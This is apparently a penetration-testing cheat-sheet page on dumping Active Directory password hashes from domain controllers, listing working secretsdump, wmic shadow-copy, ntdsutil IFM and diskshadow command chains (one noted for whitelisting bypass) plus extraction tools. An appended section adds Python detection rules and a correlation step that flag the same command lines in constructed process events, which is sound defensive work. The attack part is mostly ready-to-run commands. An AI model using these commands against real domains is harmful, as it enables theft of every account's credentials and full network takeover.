Gibson> Download Garbage

Dump the domain (Domain Controllers)


Last updated 4 years ago

Remote Access

Secretsdump.py

secretsdump -just-dc-ntlm -user-status -o [out_file] [Domain]/[User]@[IP] 

WMIC & NTDSutil

from:

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"
copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

Metasploit

auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdump

Local Access

NTDSutil

The built-in Windows binary ntdsutil.exe can export ntds.dit together with the SYSTEM hive through its IFM (Install From Media) function:

ntdsutil "activate instance ntds" "ifm" "create full c:\windows\temp" "quit" "quit"
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Pentest' quit quit"
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Pentest' q q"

The hashes can then be extracted offline with secretsdump.py from the exported ntds.dit and the registry hives:

secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local

Alternatively, additional information can be included, such as whether each account is enabled:

secretsdump.py -system ./SYSTEM -ntds ./ntds.dit -o ntds-extract -user-status LOCAL

The output can then be filtered to keep only enabled accounts and drop machine accounts (names ending in $):

grep -i "enabled" [secretsdump_output.txt] | grep -v '\$' | sed -e 's/ (status=Enabled)//' > output-filtered.txt

Diskshadow

On Windows Server 2008 and later, diskshadow.exe can be used to copy NTDS.dit.

Create an instruction file for diskshadow.exe that makes a new shadow copy of drive C: and exposes it as drive M:

shadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% M:
exec "cmd.exe" /c copy m:\windows\ntds\ntds.dit c:\temp\ntds.dit
delete shadows volume %someAlias%
reset

Then run the script (diskshadow.exe must be run from the System32 directory):

mkdir c:\temp
diskshadow.exe /s [Path]\shadow.txt

Side note: diskshadow can be utilised for whitelisting bypass and process tree obfuscation using the "exec" function.
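From the defender's side, every chain on this page (vssadmin or diskshadow snapshot, a copy of NTDS.dit out of the snapshot, or an ntdsutil IFM export) leaves distinctive process-creation command lines. The following is an added example, not part of the original page, of detection rules run over a constructed set of Sysmon EID 1 / Security 4688 style events, with a correlation step that flags a host where a snapshot step and an NTDS.dit step both occur; the host names, images and event tuples are constructed.

```python
import re
# Detection rules: (name, severity, regex over the process command line).
# Patterns mirror the commands shown on this page (vssadmin/wmic, ntdsutil ifm, diskshadow).
RULES = [
    ("ntdsutil_ifm_export", "high", re.compile(r"ntdsutil.*(\bifm\b|create\s+full)", re.I)),
    ("ntds_dit_file_access", "high", re.compile(r"\bntds\.dit\b", re.I)),
    ("shadow_copy_device_path", "high", re.compile(r"HarddiskVolumeShadowCopy\d+", re.I)),
    ("vssadmin_create_shadow", "medium", re.compile(r"vssadmin.*create\s+shadow", re.I)),
    ("diskshadow_script_mode", "medium", re.compile(r"diskshadow(\.exe)?\s+/s\b", re.I)),
]
SEVERITY = {name: sev for name, sev, _ in RULES}

# Constructed sample of process-creation events (Sysmon EID 1 / Security 4688 style),
# as (host, parent_image, image, command_line). Not real telemetry.
SAMPLE_EVENTS = [
    ("DC01", "WmiPrvSE.exe", "cmd.exe", r"cmd /c vssadmin create shadow /for=C: 2>&1"),
    ("DC01", "WmiPrvSE.exe", "cmd.exe",
     r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit"),
    ("DC02", "powershell.exe", "ntdsutil.exe", r'ntdsutil.exe "ac i ntds" "ifm" "create full c:\Pentest" q q'),
    ("DC03", "cmd.exe", "diskshadow.exe", r"diskshadow.exe /s c:\temp\shadow.txt"),
    ("DC03", "diskshadow.exe", "cmd.exe", r"cmd.exe /c copy m:\windows\ntds\ntds.dit c:\temp\ntds.dit"),
    ("DC03", "svchost.exe", "ntdsutil.exe", r'ntdsutil.exe "ac i ntds" "files" "info" q q'),  # benign: no ifm
    ("WS01", "explorer.exe", "cmd.exe", r"cmd /c copy C:\Users\bob\report.docx \\fs01\share\report.docx"),
]

def match_rules(command_line):
    """Names of every rule whose pattern matches this command line."""
    return [name for name, _sev, rx in RULES if rx.search(command_line)]

def detect(events):
    """Per-event alerts, plus one 'critical' correlated alert per host on which a snapshot
    step and an NTDS.dit/IFM step both appear (each half looks less alarming on its own)."""
    alerts, seen = [], {}
    for host, parent, image, cmd in events:
        for name in match_rules(cmd):
            alerts.append({"host": host, "rule": name, "severity": SEVERITY[name],
                           "parent": parent, "image": image, "cmd": cmd})
            seen.setdefault(host, set()).add(name)
    staging = {"vssadmin_create_shadow", "diskshadow_script_mode", "shadow_copy_device_path"}
    theft = {"ntds_dit_file_access", "ntdsutil_ifm_export"}
    for host, names in seen.items():
        if names & staging and names & theft:
            alerts.append({"host": host, "rule": "ntds_dit_theft_via_shadow_copy",
                           "severity": "critical", "parent": None, "image": None, "cmd": None})
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['severity']:8} {a['host']:5} {a['rule']}")
```

The ntdsutil IFM export on DC02 stays a single high alert because ntdsutil takes its own snapshot, so the correlation rule is only a second signal for the vssadmin and diskshadow chains.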

Extracting from NTDS.dit

Use secretsdump.py as described above, or any of the following tools:

ntdsdecode
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
./adXtract.sh ./ntds.dit ./SYSTEM.hive

https://adsecurity.org/?p=2398